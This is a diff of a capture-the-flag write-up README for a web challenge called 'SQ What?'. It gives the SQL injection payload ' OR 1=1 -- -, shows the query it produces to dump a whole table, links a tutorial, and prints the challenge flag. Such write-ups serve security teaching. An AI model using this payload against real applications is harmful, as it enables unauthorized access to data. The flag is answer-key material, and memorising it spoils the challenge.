Perchinka/CCC_ctf/web/SQ What?/README.md

 Use payload: ```' OR 1=1 -- -```

-The result is a query ```SELECT * FROM table WHERE name = '' OR 1=1 -- -'``` Which means we display the entire contents of the table
+The result query will look like this: ```SELECT * FROM table WHERE name = '' OR 1=1 -- -'```

-You can read more at https://portswigger.net/web-security/sql-injection
+You can read more at https://portswigger.net/web-security/sql-injection about how SQL injections works

 ---
 The flag is: ```CCC{5Ql_1s_FuN!}```